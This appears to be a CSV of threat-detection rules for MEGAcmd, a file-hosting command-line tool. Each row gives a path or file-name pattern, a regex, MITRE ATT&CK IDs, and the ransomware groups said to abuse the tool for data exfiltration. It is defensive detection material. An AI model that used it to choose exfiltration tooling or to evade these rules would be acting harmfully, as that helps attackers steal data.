"*/usr/bin/mega-proxy*",".{0,1000}\/usr\/bin\/mega\-proxy.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-put*",".{0,1000}\/usr\/bin\/mega\-put.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-pwd*",".{0,1000}\/usr\/bin\/mega\-pwd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-quit*",".{0,1000}\/usr\/bin\/mega\-quit.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-reload*",".{0,1000}\/usr\/bin\/mega\-reload.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-rm*",".{0,1000}\/usr\/bin\/mega\-rm.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-session*",".{0,1000}\/usr\/bin\/mega\-session.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-share*",".{0,1000}\/usr\/bin\/mega\-share.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-showpcr*",".{0,1000}\/usr\/bin\/mega\-showpcr.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-signup*",".{0,1000}\/usr\/bin\/mega\-signup.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-speedlimit*",".{0,1000}\/usr\/bin\/mega\-speedlimit.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-sync*",".{0,1000}\/usr\/bin\/mega\-sync.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-thumbnail*",".{0,1000}\/usr\/bin\/mega\-thumbnail.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-transfers*",".{0,1000}\/usr\/bin\/mega\-transfers.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-tree*",".{0,1000}\/usr\/bin\/mega\-tree.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-userattr*",".{0,1000}\/usr\/bin\/mega\-userattr.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-users*",".{0,1000}\/usr\/bin\/mega\-users.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-version*",".{0,1000}\/usr\/bin\/mega\-version.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-webdav*",".{0,1000}\/usr\/bin\/mega\-webdav.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-whoami*",".{0,1000}\/usr\/bin\/mega\-whoami.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/share/doc/megacmd/*",".{0,1000}\/usr\/share\/doc\/megacmd\/.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\\.\\pipe\\megacmdpipe_*",".{0,1000}\\\\\.\\\\pipe\\\\megacmdpipe_.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#namedpipe","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\AppData\Local\MEGAcmd*",".{0,1000}\\AppData\\Local\\MEGAcmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\CurrentVersion\Uninstall\MEGAcmd\*",".{0,1000}\\CurrentVersion\\Uninstall\\MEGAcmd\\.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#registry","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-attr.bat*",".{0,1000}\\mega\-attr\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-backup.bat*",".{0,1000}\\mega\-backup\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-cancel.bat*",".{0,1000}\\mega\-cancel\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-cat.bat*",".{0,1000}\\mega\-cat\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-cd.bat*",".{0,1000}\\mega\-cd\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\MEGAclient.exe*",".{0,1000}\\MEGAclient\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\MEGAcmd.exe*",".{0,1000}\\MEGAcmd\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\MEGAcmd.lnk*",".{0,1000}\\MEGAcmd\.lnk.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\megacmdpipe_*",".{0,1000}\\megacmdpipe_.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#namedpipe","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\MEGAcmdServer.exe*",".{0,1000}\\MEGAcmdServer\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\MEGAcmdSetup.exe*",".{0,1000}\\MEGAcmdSetup\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\MEGAcmdSetup32.exe*",".{0,1000}\\MEGAcmdSetup32\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\MEGAcmdSetup64.exe*",".{0,1000}\\MEGAcmdSetup64\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\MEGAcmdSetup64.exe*",".{0,1000}\\MEGAcmdSetup64\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\MEGAcmdShell.exe*",".{0,1000}\\MEGAcmdShell\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\MEGAcmdUpdater.exe*",".{0,1000}\\MEGAcmdUpdater\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-confirm.bat*",".{0,1000}\\mega\-confirm\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-confirmcancel.bat*",".{0,1000}\\mega\-confirmcancel\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-cp.bat*",".{0,1000}\\mega\-cp\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-debug.bat*",".{0,1000}\\mega\-debug\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-deleteversions.bat*",".{0,1000}\\mega\-deleteversions\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-df.bat*",".{0,1000}\\mega\-df\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-du.bat*",".{0,1000}\\mega\-du\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-errorcode.bat*",".{0,1000}\\mega\-errorcode\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-exclude.bat*",".{0,1000}\\mega\-exclude\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-export.bat*",".{0,1000}\\mega\-export\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-find.bat*",".{0,1000}\\mega\-find\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*\mega-ftp.bat*",".{0,1000}\\mega\-ftp\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
